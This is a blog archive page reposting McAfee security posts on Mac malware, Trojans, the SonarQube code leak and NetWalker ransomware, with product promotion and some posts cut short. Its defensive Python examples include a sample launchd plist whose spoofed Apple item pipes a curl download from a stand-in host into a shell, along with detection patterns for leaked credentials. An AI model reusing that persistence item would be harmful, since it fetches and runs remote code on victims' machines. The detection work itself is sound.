Showing posts with label mcafee.com/activate. Show all posts

Friday, September 11, 2020

The Rise of the Strategic Threat Hunter

That puts added pressure on threat hunters to get ahead of the problem before it becomes one. As the average cost of a data breach continues to climb, too much is at risk to keep the status quo. Remediation and resolution after the fact no longer cut it. But if threat hunters know ahead of time who is being targeted and which endpoints are going to be affected, that is a game-changer. At that point, they can take proactive measures to protect their organizations.

At McAfee, our portfolio of technologies not only extends protection across all endpoints and the cloud but also streamlines the process of investigation, allowing threat hunters to drill down across sectors, industries, and regions. We cross-correlate known campaigns, using industry and geographical threat activity, with an organization’s own endpoint security posture as derived from its security telemetry.

That’s a major boon for threat hunters, who can now glean accurate insights into the constellation of potential security risks. They no longer need to manually pick through disparate pieces of data, separating false positives from real indications of trouble. So, instead of wasting precious time on busywork, they apply their talents to finding the most effective way to deal with incoming threats.

Even on a good day, the threat hunter’s job is hard enough. Without the information needed to understand the bigger picture, it looks more like Mission Impossible. But with the recently announced, uniquely proactive McAfee MVISION Insights in hand, threat hunters can finally flip the script and take the fight to the bad guys. Remember: the best defense is always a good offense.

Check it out: our Chief Scientist Raj Samani weighs in on MVISION Insights.


Looking ahead: more working from home?

While each of these statistics provides its own snapshot of life during the lockdown, what remains to be seen is how the time we’ve spent at home will shape the way we work, learn, socialize, and entertain ourselves in the months to come. At least right now, it seems that people want or expect to see change. A new study from McAfee surveyed 1,000 working adults in the U.S. between the ages of 18 and 74 in May 2020 and found that nearly half (47%) of employees do not want to go back to working the way they did before stay-at-home measures were put in place.

However that plays out in the future, it’s important to protect ourselves today while we continue to rely on our devices so heavily. Comprehensive security software, like McAfee Total Protection, can help protect devices against malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which can help identify malicious websites before you land on them.

And one last stat: according to Nielsen, American streaming rates in the first three weeks of March this year were 85% higher than in the same weeks of March 2019. Again, no surprise. One thing to be on the lookout for, though, is phishing and malware attacks built around movies and shows offered as a “free” stream or download. It’s a common method of attack, and we’ve compiled our Top 10 U.S. List of TV and Movie Titles That Could Lead You to a Dangerous Download. Give the article a look: not only does it name the titles, it also offers advice for keeping safe.

Stay Updated 

To stay updated on all things McAfee, and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

Virtually Impossible to Miss McAfee at Black Hat 2020

Black Hat 2020 is going virtual this year, providing attendees with the latest security research, development, and trends. Every year McAfee presents its latest security research, and this year promises to be innovative and informative. You can expect insightful new findings from the McAfee Advanced Threat Research team. Also, join us at the virtual booth to shift your cybersecurity left with new SOC solutions and check out McAfee’s advanced device-to-cloud security solutions.

What should attendees expect from McAfee at Black Hat USA?

Chief Scientist and McAfee Fellow Raj Samani spoke with Black Hat in an executive spotlight interview, saying: “Every year we present our latest security research and this year promises to be out of this world!! Ahem… I don’t want to give too much away but you can expect some tremendous new findings from the McAfee Advanced Threat Research team. Also, get ready for more SOC options from McAfee with a unique solution that shifts cybersecurity left, as well as even more advanced device to cloud protection.”

Read the full interview here.


Thursday, September 10, 2020

Operation North Star Overview

Over the last few months, we have seen attackers take advantage of the pandemic as cover to launch cyberattacks. One example is a campaign, observed by McAfee Advanced Threat Research (ATR), that increased malicious activity against the aerospace and defense industry. In this campaign, McAfee ATR discovered a series of malicious documents, used as lures in a very targeted fashion, containing job postings taken from leading defense contractors. This type of campaign appeared before, in 2017 and 2019, using similar techniques, but the 2020 campaign has distinct differences in implants, infrastructure, and spear-phishing lures. For a more detailed analysis of this campaign, please see the McAfee ATR blog.

This blog is focused on how to build an adaptable security architecture to increase your resilience against these types of attacks and specifically, how McAfee’s portfolio delivers the capability to prevent, detect and respond against the tactics and techniques used in the Operation North Star campaign.


Removing a Virus from a Mac

For Mac computers, entering Safe mode is an even simpler process.

On an Intel-based Mac, all you need to do is hold the Shift key while the system boots. If you’ve done this properly, you will see “Safe Boot” in the login window (Apple support article HT201262). On a Mac with Apple silicon, hold the power button until the startup options appear, select your startup disk, then hold Shift and click “Continue in Safe Mode”. From there, run your virus removal programs and clean your system. For both Windows computers and Macs, run your virus scan multiple times to make sure the system is clean.

Seek Professional Help

If you’ve gone through this process but are still struggling with a virus, you may need to call in a professional to clean your computer. For example, with the McAfee Virus Removal Service, a security expert can remove stubborn viruses from your computer over a remote connection.

Avoiding Computer Viruses

The easiest way to remove computer viruses from your life is to avoid them in the first place.

It is vitally important to keep your system secure by following these best practices:

• Maintain backups of your data.

• Clean up temporary files and cached content.

• Uninstall applications you no longer use.

• Update the OS and all remaining applications.

• Check startup apps and disable any you don’t need.

• Verify your security subscription status.

• Confirm your security software is up to date.

• Use trusted sources: do not download software from a source you do not recognize, and do not run unsolicited programs.

And always Surf Safely using these tips:

• Use the WebAdvisor browser extension.

• Use VPN software while using untrusted networks.

• Use a password manager.

• Refrain from using the same usernames and password for web pages especially financial or shopping sites.

• Set up cloud accounts using an email address that offers account-recovery support, such as an account from your ISP or a paid email service.

• Apple offers account recovery assistance for Apple IDs; free webmail accounts such as Gmail or Yahoo offer only self-service recovery, so if you lose both the password and the recovery options there is no one who can confirm your ownership.

Stay Protected

Professional security software from McAfee is a smart long-term investment in your computer. You can keep both your data and your identity safe while maintaining system performance. With the right program running in the background, your system will be ready to handle the threats in your digital world.

How to Wipe Out a Computer Virus?

While some malicious programs are little more than a nuisance, many others can steal your most personal, private, and sensitive information. In this article, you’ll learn some of the signs that you may have a computer virus, and tips for removing one effectively.

What is a computer virus?

Computer viruses take many forms. In general terms, a virus is unwanted code designed to get into your computer and disrupt it; much like a biological virus, it replicates itself and then tries to spread to other systems. Some only affect your web browser. Others are far more harmful: a rootkit digs deep into the internal controls of the operating system so it can hide itself, and a trojan sneaks onto your device disguised as a program that seems legitimate.

Signs of a Virus

A sudden slowdown may be the first sign that you have a virus, and you may notice that programs which used to load quickly take longer and longer to load. You may also receive multiple error messages about programs becoming unresponsive. In this case, the virus is using the processing power of your own computer system, and consequently, other programs are having trouble running at the same time.

Some viruses and malware only affect certain parts of your system. For example, you could discover that your browser’s home page has changed without your knowledge. You may also have trouble reaching antivirus and antimalware sites, and if a virus gets into your email program, you may start to hear from your contacts about strange emails coming from your computer.

How does a virus get on your computer?

Computer viruses have been around for about as long as personal computers, and virus authors understand that human error is always the easiest way to get a virus installed. So while antivirus software can prevent most automated threats, it cannot stop a user from clicking the wrong link or installing compromised software on their own system. When you download programs or data from an unfamiliar site, remember that you may also be unknowingly accepting a viral program onto your system. Links in malicious emails can also start an automatic download.

And new viruses appear all the time. The experts at McAfee are constantly learning about new malicious programs and developing countermeasures. If you do not regularly update your virus definitions, however, a harmful program may still be able to sneak past your defensive software.

Wednesday, September 9, 2020

Understanding Trojan Viruses and How to Get Rid of Them


Basic online scenario—You log onto your computer and notice that something’s just not right, but you can’t quite put your finger on it. Something just seems…a bit off. If you’ve found yourself in this situation, or even thinking you are, there’s a real possibility you could have a Trojan virus on your computer.

Trojan viruses can not only steal your most personal information, but they also put you at risk for identity theft and other serious cybercrimes. In this post, we’ll examine what Trojan viruses are, and where they come from. We’ll also cover how you can protect yourself and get rid of viruses so you can stay safe and maintain peace of mind online.

What Trojan Viruses Do

Trojan viruses are a type of malware that gets onto your computer disguised as a real, working program. Once a trojan is inside your system, it can perform destructive actions before you even know it’s there. Some trojans sit idle and wait for further instructions from their operator, while others begin their malicious activity right from the start.

Some trojans download additional malware onto your computer and then bypass your security settings while others try to actively disable your antivirus software. Some Trojans hijack your computer and make it part of a criminal DDoS (Distributed Denial of Service) network.

How to Remove a Trojan Virus

Before you discover all the places a Trojan can invade your computer, let’s first learn how to get rid of one. You can remove some Trojans by disabling startup items that don’t come from trusted sources. For the best results, first reboot your device into safe mode so that the malware can’t stop you from removing it.

Make sure you know exactly which programs you’re removing, because you could slow, disable, or cripple your system if you remove components your computer needs to function. Installing and using a McAfee antivirus solution is also one of the most reliable ways to get rid of trojans. An effective antivirus program checks file reputation and application behavior as well as known trojan signatures in order to detect, isolate, and promptly remove them. In addition to spotting known trojans, the McAfee antivirus program can identify new trojans by detecting suspicious activity inside your applications.


Can Macs get Viruses?

In addition to their ability to work seamlessly with other Apple devices, many users prefer Mac computers because of their perceived “inherent” security. Apple also notifies users of periodic updates to make sure every generation of Apple products has the most secure software version. And while Apple does go to great lengths to keep its devices safe, for example by making it harder to install software that does not come from the Mac App Store or a notarized developer, this does NOT mean your Mac is immune to all computer viruses.

What is a virus?

A virus is any piece of malicious software that invades your computer system and then copies itself. It can then spread to other systems. The result can be stolen personal or financial information, corrupted files, or cryptojacking. Here are some of the common viruses that infect Apple devices, and some of the best ways to protect your computer from them.

CookieMiner

CookieMiner is malware that captures Chrome browser authentication cookies, primarily those associated with cryptocurrency exchanges. The CookieMiner code gets past the security controls of both Apple and the exchanges by stealing credentials such as usernames, passwords, and saved login data. It can also read iPhone text messages from iTunes backups stored on the Mac, which helps the attacker get past SMS-based two-factor checks when logging into an exchange, and from there open wallets and steal cryptocurrencies such as Bitcoin, Ethereum, and XRP. Stealing cryptocurrency isn’t enough for CookieMiner’s operators, however: they also use the malware to load mining software onto MacBooks to mine Koto, a little-known Japanese cryptocurrency.

Besides a significantly lighter crypto wallet, there are other clues that your Mac may be infected with CookieMiner. Because it also runs a cryptocurrency miner, CookieMiner uses a significant share of the CPU, so an infected Mac will be slow to complete even basic tasks. You may also notice that other applications on your Mac work poorly or stop working completely, and your Mac may overheat.

OSX/Dok… Next Generation

OSX/Dok is malware that silently takes control of the network traffic entering and leaving a Mac. It reroutes that traffic through a malicious proxy server, giving the attacker access to your communications. It got past Apple’s checks because it was signed with a legitimate Apple developer certificate that vouched for its authenticity. Because Dok also installs its own root certificate on the Mac, the attacker can even read data that moves over TLS-encrypted connections, such as online banking sessions. This is especially troubling since Apple devices such as iPhones, iPads, and MacBooks are commonly synced to operate together.

While the original version of OSX/Dok was stopped when Apple revoked the developer certificate it used, later versions have appeared signed with different developer certificates. Macs are exposed to this malware mainly when users are tricked into downloading files through email phishing. Once installed, the software immediately takes over critical operations. Users then typically see a message that the system has detected a security issue; the malware prompts them to install an “update” and locks up the machine until they enter their password to approve it. With that password, the malware has full administrative privileges and complete control of the device.

Crossrider

Crossrider is a variant of the OSX/Shlayer malware and uses a fake Adobe Flash Player installer to drop other malicious code onto your Apple devices. Users download the fake installer after being shown a message telling them to update Flash Player. If you follow the link, you get the fake installer instead of the real update from Adobe’s website. The fake installer then prompts you for your password so that the software can make changes to your system and install itself.

Advanced Mac Cleaner, Chumsearch Safari Extension, and MyShopCoupon+ are some of the items that are installed through the fake Adobe Flash player installer. While MyShopCoupon+ and Chumsearch Safari Extension do cause minor annoyances to users, Advanced Mac Cleaner can cost you much more if you’re not careful. Advanced Mac Cleaner appears to run a security scan of your system and identifies several issues. It then asks the user to pay $107 to activate the program’s clean-up feature.

Macros Viruses… From Microsoft Word

Macro viruses used to be a problem only PC users faced. Macros are pieces of code embedded in documents to automate routine tasks. The code, written in Visual Basic for Applications (VBA), can be abused to hijack the application and do harm when users open documents in Microsoft Office products such as Word, Excel, or Project. VBA commands in a macro can delete or corrupt files. When you use Word to open an infected file, Word catches the virus (typically by infecting the global template) and passes it on to every Word document you subsequently create.

Microsoft removed VBA macro support from Office 2008 for Mac but restored it in Office 2011 and later versions of Word and Excel. Mac users still have some protection against macro viruses, since Office does not enable macros automatically by default.
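The check a practitioner wants here is a quick way to tell whether a document carries a macro project at all, before it ever reaches Word. The following Python is an added example (not from the original post): a .docx/.docm/.xlsm file is a ZIP archive, and Office stores the VBA project in a part named vbaProject.bin that is declared in [Content_Types].xml with the content type application/vnd.ms-office.vbaProject. The two sample documents are constructed in memory and are not real Word files.

```python
"""Check whether an Office Open XML document carries a VBA macro project.

Added example, not from the original post. The sample documents are
minimal ZIP archives built in memory, not files produced by Word.
"""
import io
import zipfile

VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"


def office_file_has_macros(data: bytes) -> bool:
    """Return True if the zipped Office document contains a VBA project part."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
            # The part itself (word/vbaProject.bin, xl/vbaProject.bin, ...).
            if any(n.lower().endswith("vbaproject.bin") for n in names):
                return True
            # Or its declaration in the content-types manifest.
            if "[Content_Types].xml" in names:
                manifest = zf.read("[Content_Types].xml").decode("utf-8", "replace")
                return VBA_CONTENT_TYPE in manifest
    except zipfile.BadZipFile:
        # Not an OOXML container at all (could be a legacy OLE2 .doc); treat as no macros found.
        return False
    return False


def _build_doc(with_macro: bool) -> bytes:
    """Construct a minimal OOXML-like archive for demonstration (not a valid Word file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        overrides = [
            '<Override PartName="/word/document.xml" '
            'ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
        ]
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\x00" * 16)  # placeholder bytes, constructed
            overrides.append(f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>')
        zf.writestr("[Content_Types].xml", "<Types>" + "".join(overrides) + "</Types>")
    return buf.getvalue()


# Constructed samples: one clean document and one that carries a VBA project.
CLEAN_DOC = _build_doc(with_macro=False)
MACRO_DOC = _build_doc(with_macro=True)

if __name__ == "__main__":
    print("clean document has macros:", office_file_has_macros(CLEAN_DOC))
    print("macro document has macros:", office_file_has_macros(MACRO_DOC))
```

To run this over real attachments, read each file’s bytes and pass them to office_file_has_macros; a file whose name ends in .docx but contains vbaProject.bin deserves a closer look, since Word only runs macros from the macro-enabled formats.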

MShelper

MShelper is cryptocurrency-mining malware that lets an attacker help himself to your computer’s processing power in order to mine cryptocurrency for his own wallet. Its operators also use it to display advertisements in browsers such as Chrome and Firefox. Security researchers report that MShelper reaches Macs when users download files of dubious origin. Signs that your computer has been infected include reduced battery life, fast-spinning fans, overheating, and increased noise.

Since mining software uses a great deal of CPU, MShelper is not hard to spot. Open Activity Monitor and click the CPU tab; on an infected Mac a process named mshelper will show up at or near the top of the list with extremely high CPU usage.

Tips for Safeguarding Macs Against Malware

While Apple does an amazing job of guarding Macs against common security threats, it just can’t stop every determined hacker who looks at its devices as a challenge.

Here are some top tips for shoring up security on your Mac:

  • Avoid opening spam emails and attachments.
  • Don’t download questionable files.
  • Install ad-blocking applications.
  • Create frequent system backups (Time Machine).
  • Install the latest OS and application updates.
  • Manage your data.
  • Install a security suite (antivirus, firewall, browser destination monitoring).
  • Use VPN software when connected to public or untrusted networks.
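Both the advice above and the earlier trojan-removal step (disable startup items that don’t come from trusted sources) come down to reviewing what the machine launches at boot. On a Mac that means launchd: agents and daemons are described by property-list files in ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons, and a dropper that wants to survive a reboot usually writes one there. The following Python is an added example, not part of the original post and not McAfee’s detection logic; the plists are constructed inline, the flag rules are this example’s own heuristics, and example.invalid is a reserved hostname that never resolves.

```python
"""Triage launchd persistence items on a Mac.

Added example; not from the original post. The two plists below are
constructed in code, and the flag rules are this example's own heuristics.
"""
import plistlib
import re

# Apple's own launch items live here; a com.apple.* label anywhere else is impersonation.
APPLE_OWNED_DIRS = ("/System/Library/", "/Library/Apple/")
# Programs started from temp or per-user directories are unusual for trusted software.
USER_WRITABLE_RE = re.compile(r"^(/tmp/|/var/tmp/|/private/tmp/|/Users/[^/]+/)")
INTERPRETERS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/osascript", "/usr/bin/python3"}
# Download-and-execute cradles handed to an interpreter.
STAGER_RE = re.compile(r"(curl|wget|base64|https?://)", re.IGNORECASE)


def triage_launch_item(plist_path: str, plist_bytes: bytes) -> dict:
    """Parse one launchd plist and report why (if at all) it should be distrusted."""
    item = plistlib.loads(plist_bytes)  # handles XML and binary plists
    args = [str(a) for a in item.get("ProgramArguments", [])]
    program = str(item.get("Program") or (args[0] if args else ""))
    label = str(item.get("Label", ""))
    reasons = []
    if program and USER_WRITABLE_RE.match(program):
        reasons.append("program lives in a temp or per-user directory")
    if program in INTERPRETERS and any(STAGER_RE.search(a) for a in args[1:]):
        reasons.append("interpreter invoked with a download/decode cradle")
    if label.startswith("com.apple.") and not plist_path.startswith(APPLE_OWNED_DIRS):
        reasons.append("com.apple.* label outside Apple-owned directories")
    return {
        "path": plist_path,
        "label": label,
        "program": program,
        "run_at_load": bool(item.get("RunAtLoad", False)),
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


# Constructed samples: a benign-looking updater and a dropper's persistence item.
SAMPLE_ITEMS = [
    ("/Users/alice/Library/LaunchAgents/com.example.updater.plist",
     plistlib.dumps({
         "Label": "com.example.updater",
         "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater", "--check"],
         "StartInterval": 3600,
     })),
    ("/Users/alice/Library/LaunchAgents/com.apple.systemhelper.plist",
     plistlib.dumps({
         "Label": "com.apple.systemhelper",
         "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL http://example.invalid/s | sh"],
         "RunAtLoad": True,
         "KeepAlive": True,
     })),
]


def triage_all(items=SAMPLE_ITEMS) -> list:
    """Triage every (path, plist bytes) pair and return the results in order."""
    return [triage_launch_item(path, data) for path, data in items]


if __name__ == "__main__":
    for result in triage_all():
        verdict = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{verdict:10} {result['label']} -> {result['program']} {result['reasons']}")
```

On a live system, walk the three launch-item directories, read each file’s bytes and pass them in. Legitimate third-party agents that run from ~/Library/Application Support will trip the path rule, so treat hits as leads for manual review; when you do decide to remove one, unload it with launchctl bootout (launchctl unload on older macOS) before deleting the plist, or it keeps running until the next reboot.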

Stay protected

Subscribing to a comprehensive security suite is one of the most effective steps you can take to safeguard your Apple devices, financial information, and privacy while online. McAfee partners with industry, IT experts, and the user community to deliver the most powerful cybersecurity solutions on the market.

Check more information about our latest security products.

Source Code Leak – What We Learned and How You Can Protect Your IP

This week we learned about a leak of source code from 50 prominent companies, posted by a Swiss IT consultant. These come after another recent leak of source code from Nintendo, prompting us to comment on the issue of IP protection and secure development pipelines.  

The latest leak appears to stem primarily from a misconfiguration of SonarQube, an open-source tool for static code analysis, which allows developers to audit their code for bugs and vulnerabilities prior to deployment.  

Our own assessment found that SonarQube listens on TCP port 9000 by default, and for the affected companies that port was evidently left open to the internet, allowing researchers to reach the instances and discover the data now exposed in the leak.

A search for SonarQube on Shodan, the popular search engine for internet-connected devices, lets anyone find exposed instances of common software like this in seconds. With that information so readily available, a port unintentionally left open invites a wide swath of intrusion attempts.

Several of the source code repositories also contained hard-coded credentials, which open the door to accessing other resources and expansion of the breach. It is a best practice to never commit code with hard-coded/plaintext credentials to your repositories.   
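The practical counterpart to “never commit hard-coded credentials” is a scanner that runs before code reaches the repository. The following Python is an added example, not from the original post: it runs a handful of narrow patterns (AWS access key IDs, PEM private-key headers, credentials embedded in URLs, and password/secret/token-style variables assigned a quoted literal) over source text, skips values that are obviously templated, and masks what it reports so the secret is not echoed into CI logs. The sample source is constructed; it uses AWS’s published documentation example key and a reserved .invalid hostname, and the patterns are this example’s own choices.

```python
"""Scan source text for hard-coded credentials before it is committed.

Added example, not from the original post. The patterns are this example's
own choices and deliberately narrow; the sample source is constructed.
"""
import re

SECRET_PATTERNS = {
    # AWS access key IDs: AKIA (long-term) or ASIA (temporary) plus 16 uppercase alphanumerics.
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    # PEM private-key headers of any flavour (RSA, EC, OPENSSH, unqualified).
    "private_key": re.compile(r"-----BEGIN (?:[A-Z ]+ )?PRIVATE KEY-----"),
    # Credentials embedded in a URL: scheme://user:password@host
    "url_basic_auth": re.compile(r"\b[a-z][a-z0-9+.-]*://[^/\s:@]+:([^@\s]+)@"),
    # password/secret/token-like names assigned a quoted literal of 6+ characters.
    "literal_assignment": re.compile(
        r"(?i)(?:password|passwd|pwd|secret|api[_-]?key|token)\w*\s*[:=]\s*['\"]([^'\"]{6,})['\"]"),
}
# Values that are templated or injected at deploy time rather than real secrets.
PLACEHOLDER_RE = re.compile(r"^(\$\{|\$[A-Z_]+$|<[^>]+>$|%[^%]+%$|\{\{)")


def mask(value: str) -> str:
    """Keep just enough of the match to locate it; never echo full secrets into logs."""
    return value[:4] + "*" * max(0, len(value) - 4)


def scan_source(text: str) -> list:
    """Return one finding per (line, pattern) hit as {'line', 'kind', 'evidence'}."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in SECRET_PATTERNS.items():
            m = pattern.search(line)
            if not m:
                continue
            value = m.group(1) if m.groups() else m.group(0)
            if PLACEHOLDER_RE.match(value):
                continue
            findings.append({"line": line_no, "kind": kind, "evidence": mask(value)})
    return findings


# Constructed sample: AKIAIOSFODNN7EXAMPLE is AWS's documentation example key.
SAMPLE_SOURCE = """\
import os
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
DB_PASSWORD = "hunter2hunter2"
db_url = "postgres://app:s3cretpw@db.internal:5432/app"
api_key = os.environ["API_KEY"]           # fine: read from the environment
token = "${VAULT_TOKEN}"                  # fine: placeholder filled at deploy time
-----BEGIN RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for f in scan_source(SAMPLE_SOURCE):
        print(f"line {f['line']:>3}  {f['kind']:<20} {f['evidence']}")
```

Wired into a pre-commit hook (feed it the output of git diff --cached), a scanner like this stops the most common leaks at the developer’s desk; it is not a substitute for rotating any credential that has already been pushed, since the repository history still holds it.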

How You Can Protect Your IP  

Mistakes like misconfiguration and accidental credential exposure will happen in the development process, which is where InfoSec teams need to step in. Auditing infrastructure code both prior to deployment and continuously in production is essential for companies practicing DevOps and CI/CD.  

Our solution to this problem is McAfee MVISION Cloud, the multi-cloud security platform that lets enterprises protect their data, prevent threats, and maintain secure deployments for their cloud-native apps.

Audit Cloud Accounts for Misconfiguration 

With McAfee MVISION Cloud, InfoSec teams can monitor their company’s public cloud accounts, such as AWS, Azure, or GCP, for configuration mistakes that may expose sensitive data. In the example below, MVISION Cloud discovered that a resource in AWS EC2 was configured with unrestricted access to ports other than 80/443, opening up breach scenarios like the one we saw in the source code leak.
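To make the “unrestricted access to ports other than 80/443” check concrete, here is an added Python example (not from the original post, and not MVISION Cloud’s own logic) that walks an EC2 security group and flags every inbound rule reachable from 0.0.0.0/0 or ::/0 on a port outside 80 and 443. The input shape mirrors what boto3’s ec2.describe_security_groups() returns; the security group below, including its group ID, is constructed by hand.

```python
"""Flag EC2 security group rules that expose ports other than 80/443 to the internet.

Added example, not from the original post. The security group is constructed;
the dict layout follows boto3's describe_security_groups() response.
"""
WORLD_CIDRS = {"0.0.0.0/0", "::/0"}
ALLOWED_PUBLIC_PORTS = {80, 443}


def _world_sources(permission: dict) -> list:
    """CIDR blocks in this rule that mean 'anyone on the internet'."""
    v4 = [r["CidrIp"] for r in permission.get("IpRanges", []) if r.get("CidrIp") in WORLD_CIDRS]
    v6 = [r["CidrIpv6"] for r in permission.get("Ipv6Ranges", []) if r.get("CidrIpv6") in WORLD_CIDRS]
    return v4 + v6


def unrestricted_rules(security_group: dict) -> list:
    """Return a finding for each inbound rule open to the world on a port outside 80/443."""
    findings = []
    for perm in security_group.get("IpPermissions", []):
        sources = _world_sources(perm)
        if not sources:
            continue  # restricted to specific networks; not our concern here
        proto = perm.get("IpProtocol")
        low, high = perm.get("FromPort"), perm.get("ToPort")
        if proto == "-1":
            ports = "all traffic"  # protocol -1 has no port fields
        elif low is None or high is None:
            ports = f"{proto} (all)"
        elif all(p in ALLOWED_PUBLIC_PORTS for p in range(low, high + 1)):
            continue  # only 80 and/or 443 exposed; acceptable for a public web front end
        else:
            ports = f"{proto}/{low}" if low == high else f"{proto}/{low}-{high}"
        findings.append({
            "group": security_group.get("GroupId"),
            "ports": ports,
            "sources": sources,
        })
    return findings


# Constructed sample group: a build server that also exposes SSH and SonarQube's default port.
SAMPLE_GROUP = {
    "GroupId": "sg-0123456789abcdef0",
    "GroupName": "build-server",
    "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
        {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
        {"IpProtocol": "tcp", "FromPort": 9000, "ToPort": 9000,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": [{"CidrIpv6": "::/0"}]},
        {"IpProtocol": "tcp", "FromPort": 5432, "ToPort": 5432,
         "IpRanges": [{"CidrIp": "10.0.0.0/8"}], "Ipv6Ranges": []},
        {"IpProtocol": "-1", "IpRanges": [], "Ipv6Ranges": [{"CidrIpv6": "::/0"}]},
    ],
}

if __name__ == "__main__":
    for f in unrestricted_rules(SAMPLE_GROUP):
        print(f"{f['group']}: {f['ports']} open from {', '.join(f['sources'])}")
```

Against a real account, loop over boto3.client("ec2").describe_security_groups()["SecurityGroups"] and pass each group in; run it from a scheduled job so a rule that is “temporarily” opened during debugging does not quietly become permanent.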



Tuesday, September 8, 2020

Defensive Architecture Overview

Today’s digital enterprise is a hybrid environment of on-premises systems and cloud services with multiple entry points for attacks like NetWalker. The work-from-home operating model forced by COVID-19 has only expanded the attack surface and increased the risk of a successful ransomware attack for organizations that did not adapt their security posture. Mitigating the risk of attacks like NetWalker requires a security architecture with the right controls on the device, on the network, and in security operations (SecOps). The Center for Internet Security (CIS) Top 20 Critical Security Controls provide a good guide for building that architecture. For ransomware, and NetWalker in particular, the controls must be layered throughout the enterprise. The following outlines the key security controls needed at each layer of the architecture to protect your enterprise against ransomware.


To assess your capability against NetWalker, you must match your existing controls against the attack stages we learned from the Preview of MVISION Insights. For a detailed analysis of the NetWalker ransomware attack, see the McAfee ATR blog; for simplicity, we have mapped the attack stages to the MITRE ATT&CK framework below.


Initial Access Stage Defensive Overview

According to threat intelligence and research, initial access is gained either through vulnerability exploitation or through spear-phishing attachments. The following chart summarizes the controls expected to be most effective against initial-access techniques, and the McAfee solutions that implement those controls where possible.

Each row below gives the MITRE tactic and technique, the CIS Critical Security Controls (CSC) that address it, and the McAfee capability that implements them.

MITRE Tactic: Initial Access
MITRE Technique: Exploit Public-Facing Application (T1190), e.g. Tomcat, WebLogic
CSC Controls: CSC 2 Inventory of Software Assets; CSC 3 Continuous Vulnerability Assessment; CSC 5 Secure Configuration of Hardware and Software; CSC 9 Limitation of Network Ports and Protocols; CSC 12 Boundary Defense; CSC 18 Application Software Security
McAfee Capability: Endpoint Security Platform 10.7, Threat Prevention, Application Control (MAC); Network Security Platform (NSP)

MITRE Tactic: Initial Access
MITRE Technique: Spearphishing Attachment (T1566.001)
CSC Controls: CSC 7 Email and Web Browser Protections; CSC 8 Malware Defenses
McAfee Capability: Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection; Web Gateway (MWG); Advanced Threat Defense; Web Gateway Cloud Service (WGCS)

MITRE Tactic: Initial Access
MITRE Technique: Valid Accounts (T1078), compromised RDP credentials
CSC Controls: CSC 5 Secure Configuration of Hardware and Software; CSC 9 Limitation of Network Ports and Protocols; CSC 12 Boundary Defense
McAfee Capability: Endpoint Security Platform 10.7, Threat Prevention

Because attackers can quickly change spear-phishing attachments, it is important to have adaptable defenses: user awareness training and response procedures, behavior-based malware defenses on email systems, web gateways and endpoints, and SecOps playbooks for early detection of and response to suspicious email attachments and other phishing techniques. For more information on how McAfee protects against suspicious email attachments, see this additional blog post.

Using valid accounts over exposed protocols such as Remote Desktop Protocol (RDP) is an initial-access technique we have seen rise during the COVID-19 period. To understand how McAfee defends against RDP as an initial access vector, and how attackers are using it to deploy ransomware, please see our previous posts.

Building Adaptable Security Architecture Against NetWalker

NetWalker Overview

The NetWalker ransomware, initially known as Mailto, was first detected in August 2019. New variants were discovered throughout 2019 and the beginning of 2020, with a strong uptick in March of this year. NetWalker has evolved into a more stable and robust ransomware-as-a-service (RaaS) model, and McAfee’s research suggests that the operators are targeting and attracting a broader range of technically advanced and enterprising criminal affiliates. McAfee Advanced Threat Research (ATR) discovered a large sum of bitcoin linked to NetWalker, which suggests its extortion efforts are effective and that many victims have had no option other than to give in to its demands. For more details on NetWalker, see the McAfee ATR blog.

We do not want you to be one of those victims, so this blog is focused on how to build an adaptable security architecture to defeat this threat and, specifically, how McAfee’s portfolio delivers the capability to prevent, detect, and respond to NetWalker ransomware.

Gathering Intelligence on NetWalker

As always, building an adaptable defensive architecture starts with intelligence. In most organizations, the Security Operations team is responsible for threat intelligence analysis as well as threat and incident response. The Preview of McAfee MVISION Insights is a sneak peek at some of the MVISION Insights capabilities for the threat intel analyst and threat responder. The preview identifies the prevalence and severity of select top emerging threats across the globe, which lets the Security Operations Center (SOC) prioritize threat response and gather the relevant cyber threat intelligence (CTI) associated with a threat, in this case NetWalker ransomware. The CTI is provided as technical indicators of compromise (IOCs) and as MITRE ATT&CK tactics and techniques.

As a threat intel analyst or responder, you can drill down to gather more specific, actionable intelligence on NetWalker, such as its prevalence, links to other sources of information, indicators of compromise, and tactics and techniques aligned to the MITRE ATT&CK framework.


From the McAfee MVISION Insights preview, you can see that NetWalker uses tactics and techniques common to other ransomware attacks: spear-phishing attachments for Initial Access, PowerShell for deployment, modification of Registry Run keys and the Startup folder for Persistence, and, of course, encryption of files for Impact.
